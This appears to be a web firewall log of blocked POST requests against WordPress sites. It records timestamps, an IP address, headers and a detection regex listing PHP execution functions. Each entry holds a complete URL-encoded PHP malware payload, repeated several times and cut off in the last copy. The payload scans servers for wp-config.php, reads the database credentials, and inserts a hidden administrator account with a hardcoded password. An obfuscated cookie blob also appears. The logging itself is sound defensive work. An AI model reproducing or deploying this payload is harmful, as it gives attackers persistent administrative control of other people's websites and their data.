tT:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:12640\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvqSDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nsec-ch-ua:\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36\nsec-fetch-mode:navigate\n\ntT=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:08:03","213.209.159.254","POST","\/wp-admin\/network\/plugins.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> OF:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2